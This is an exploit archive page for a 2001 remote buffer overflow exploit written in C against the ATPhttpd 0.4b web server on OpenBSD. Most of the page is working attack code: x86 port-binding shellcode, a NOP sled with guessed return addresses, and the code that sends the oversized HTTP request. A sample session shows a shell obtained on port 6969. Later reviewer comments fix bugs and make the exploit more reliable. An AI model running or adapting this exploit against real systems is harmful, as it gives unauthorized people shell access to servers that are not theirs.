
atphttpd-smack.c

atphttpd-smack.c
Posted Dec 17, 2001
Authored by Tony Lambiris | Site sec.angrypacket.com

ATPhttpd v0.4b remote buffer overflow exploit. Tested on and against OpenBSD 2.8. Binds a shell to port 6969 which has the UID of the webserver.

tags | exploit, remote, overflow, shell
systems | openbsd
SHA-256 | 757c275efbea1d7b73f2905d9f4495bea18769bc447e4b0528d63eaf7503bca7

atphttpd-smack.c

/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
* "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
* was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
* source for the hell of it. Ran ye old perl Ax4000|nc and did some
* gdb'n and noticed that it said the return address was 0x41414141.
* Well that speaks for itself...
*
* - dmuz@angrypacket.com
*/

/*
* developed and tested against OpenBSD. exploit creates a port-binding
* shell on the remote machine on port 6969 with the uid of the server.
* the return address is this program's own stack pointer (get_sp) minus the
* offset, so it is only a usable guess when the exploit runs on a box with the
* same OS, architecture and stack layout as the target (the run below is
* against localhost). try offsets between 5000 and -5000 with increments
* of 100. -200 worked like a charm for me.
*
* ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
* [methodic@vulnhost] [~]$ nc localhost 6969
* whoami
* methodic
* id
* uid=1009(methodic) gid=1009(methodic)
* ^C punt!
*
* mad thankz to vegac who helped me with a lame bug i was over looking
*/

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_pton(); the original's inet_addr() was implicitly declared */
#include <netdb.h>

/* a 701-byte request path reaches the saved return address (EIP); LEN=900 overshoots it */
#define LEN 900
#define NOP 0x90

/* port binding shellcode (6969/tcp) by noir */
/*
 * Port-binding shellcode (6969/tcp) by noir, stored as 32-bit words:
 * 37 words = 148 bytes on the ILP32 i386 target. The last word holds
 * "sh", an 'A' and a 0x90 byte, i.e. the string ends "/bin/shA\x90".
 * The array carries NO NUL terminator, so size it with sizeof, never
 * strlen.
 *
 * NOTE(review): declared `long`; on an LP64 build each word is padded
 * with four zero bytes and the byte sequence is no longer the intended
 * one — this assumes a 32-bit build, confirm before reuse.
 */
long shellcode[] = {
	0x4151c931, 0x51514151, 0x61b0c031, 0x078980cd, 0x4f88c931, 0x0547c604,
	0x084f8902, 0x0647c766, 0x106a391b, 0x5004478d, 0x5050078b, 0x68b0c031,
	0x016a80cd, 0x5050078b, 0x6ab0c031, 0xc93180cd, 0x078b5151, 0xc0315050,
	0x80cd1eb0, 0xc9310789, 0x50078b51, 0xb0c03150, 0x4180cd5a, 0x7503f983,
	0x5b23ebef, 0xc9311f89, 0x89074b88, 0x8d51044f, 0x078b5007, 0xc0315050,
	0x80cd3bb0, 0x5151c931, 0x01b0c031, 0xd8e880cd, 0x2fffffff, 0x2f6e6962,
	0x90416873
};

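/*
 * Return the (low 32 bits of the) current stack pointer; main() uses it
 * as the base of the guessed return address.
 *
 * The original had no `return` statement and relied on the side effect
 * of `movl %esp,%eax` — undefined behaviour in C. The value is now handed
 * back through an explicit asm output operand. i386/x86-64 only.
 *
 * NOTE(review): this reads the exploit's OWN stack, not the target's; it
 * is only a meaningful base when attacker and target share OS, architecture
 * and a similar stack layout (the usage example in the header runs against
 * localhost).
 */
unsigned long get_sp(void) {
	unsigned int sp;

	/* volatile: the value differs per call site, so it must not be CSE'd */
	__asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
	return sp;
}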

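/*
 * Print the command-line synopsis and exit. Reached on a missing -h or an
 * unknown option, so the exit status is now 1 (the original exited 0, which
 * made a usage error indistinguishable from success to a calling script).
 *
 * progname: argv[0], only used in the message.
 */
int usage(char *progname) {
	fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
	exit(1);
}

/* Parse a whole decimal string into *out; -1 on junk, empty input or overflow. */
static int parse_long(const char *text, long *out) {
	char *end;
	long value;

	errno = 0;
	value = strtol(text, &end, 10);
	if (end == text || *end != '\0' || errno == ERANGE) {
		return -1;
	}
	*out = value;
	return 0;
}

/* Write all of buf to fd, retrying on short sends; -1 on error. */
static int send_all(int fd, const char *buf, size_t len) {
	while (len > 0) {
		ssize_t sent = send(fd, buf, len, 0);
		if (sent < 0) {
			return -1;
		}
		buf += sent;
		len -= (size_t)sent;
	}
	return 0;
}

/*
 * Build the oversized GET request and deliver it to the target.
 *
 * Options:
 *   -h <ip>      target, dotted quad (required)
 *   -p <port>    target port, 1-65535; 0 or absent means 80
 *   -o <offset>  subtracted from this process's stack pointer (get_sp) to
 *                form the guessed return address; may be negative
 *
 * Payload layout (LEN bytes, same as the original):
 *   [0, LEN/2-100)                 NOP sled
 *   [LEN/2-100, +sizeof shellcode) bind-shell shellcode
 *   rest                           guessed return address, repeated;
 *                                  last byte forced to NUL
 * The request sent is "GET <payload> HTTP/1.0\r\n\r\n".
 *
 * Fixes relative to the original: `usage` is defined before use instead of
 * being implicitly declared; the shellcode is copied with sizeof rather than
 * strlen (the array has no NUL terminator, so strlen read past its end and
 * the copy length depended on whatever followed it in .data); port/offset
 * are range-checked instead of atoi/atol into an int printed with %ld; the
 * return-address fill uses memcpy instead of an unaligned `*(long *)` store
 * (which on an LP64 build also wrote 8 bytes at payload[896], past the
 * 900-byte buffer); malloc, inet_addr and send are no longer unchecked;
 * request assembly is bounded by snprintf.
 *
 * Returns 0 once the request is sent; exits 1 on bad arguments or any
 * address/socket failure.
 */
int main(int argc, char *argv[]) {
	char *host = NULL;
	long port = 0, offset = 0;
	unsigned long retaddr;
	size_t sled = LEN / 2 - 100;   /* NOP sled length, as in the original */
	size_t i;
	int ch, sockfd, reqlen;
	char payload[LEN];
	char http_request[LEN + 20];
	struct sockaddr_in s;

	while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
		switch (ch) {
		case 'h':
			host = optarg;
			break;
		case 'p':
			if (parse_long(optarg, &port) != 0 || port < 0 || port > 65535) {
				fprintf(stderr, " + bad port: %s\n", optarg);
				exit(1);
			}
			break;
		case 'o':
			if (parse_long(optarg, &offset) != 0) {
				fprintf(stderr, " + bad offset: %s\n", optarg);
				exit(1);
			}
			break;
		default:
			usage(argv[0]);
		}
	}

	printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
	if (!host) {
		usage(argv[0]);
	}
	if (!port) {
		port = 80;
	}

	/* setup socket structure; inet_pton accepts only a dotted quad */
	memset(&s, 0, sizeof s);
	s.sin_family = AF_INET;
	s.sin_port = htons((unsigned short)port);
	if (inet_pton(AF_INET, host, &s.sin_addr) != 1) {
		fprintf(stderr, " + bad target address: %s\n", host);
		exit(1);
	}

	/*
	 * build c0dez.. the return address is derived from OUR stack pointer, so
	 * it is only a sensible guess when this binary runs on the same platform
	 * as the target. Subtracting the signed offset from an unsigned value
	 * wraps modulo 2^N, which is exactly what a negative offset needs.
	 */
	retaddr = get_sp() - (unsigned long)offset;
	printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);

	/* keep room for the shellcode and for the terminating NUL at payload[LEN-1] */
	if (sled + sizeof shellcode >= LEN) {
		fprintf(stderr, " + shellcode does not fit in the payload\n");
		exit(1);
	}

	/* fill the buffer with return addr's (memcpy: no alignment assumptions) */
	memset(payload, 0, sizeof payload);
	for (i = 0; i + sizeof retaddr <= LEN; i += sizeof retaddr) {
		memcpy(payload + i, &retaddr, sizeof retaddr);
	}

	/* NOP sled, then the shellcode, then terminate the payload string */
	memset(payload, NOP, sled);
	/*
	 * sizeof, not strlen: shellcode[] carries no NUL. NOTE(review): the array
	 * is `long`, so this is the intended 148-byte sequence only on an ILP32
	 * (i386) build — on LP64 every word gains four zero bytes.
	 */
	memcpy(payload + sled, shellcode, sizeof shellcode);
	payload[LEN - 1] = '\0';

	/*
	 * %s stops at the first NUL, so a return address containing 0x00 silently
	 * truncates the payload. Presumably the server also ends the path at
	 * whitespace, in which case 0x20/0x0d/0x0a bytes in retaddr would too.
	 */
	reqlen = snprintf(http_request, sizeof http_request,
	                  "GET %s HTTP/1.0\r\n\r\n", payload);
	if (reqlen < 0 || (size_t)reqlen >= sizeof http_request) {
		fprintf(stderr, " + request does not fit in its buffer\n");
		exit(1);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror(" + socket");
		exit(1);
	}
	if (connect(sockfd, (struct sockaddr *)&s, sizeof s) == -1) {
		perror(" + connect");
		close(sockfd);
		exit(1);
	}

	printf(" + sending payload to <%s> on port [%ld].. ", host, port);
	fflush(stdout);
	if (send_all(sockfd, http_request, (size_t)reqlen) != 0) {
		perror(" + send");
		close(sockfd);
		exit(1);
	}
	printf("done\n");
	close(sockfd);

	/* the bound shell presumably has no authentication: anyone who can reach 6969/tcp gets it */
	printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
	printf(">> visit http://sec.angrypacket.com for more security tools\n");

	return 0;
}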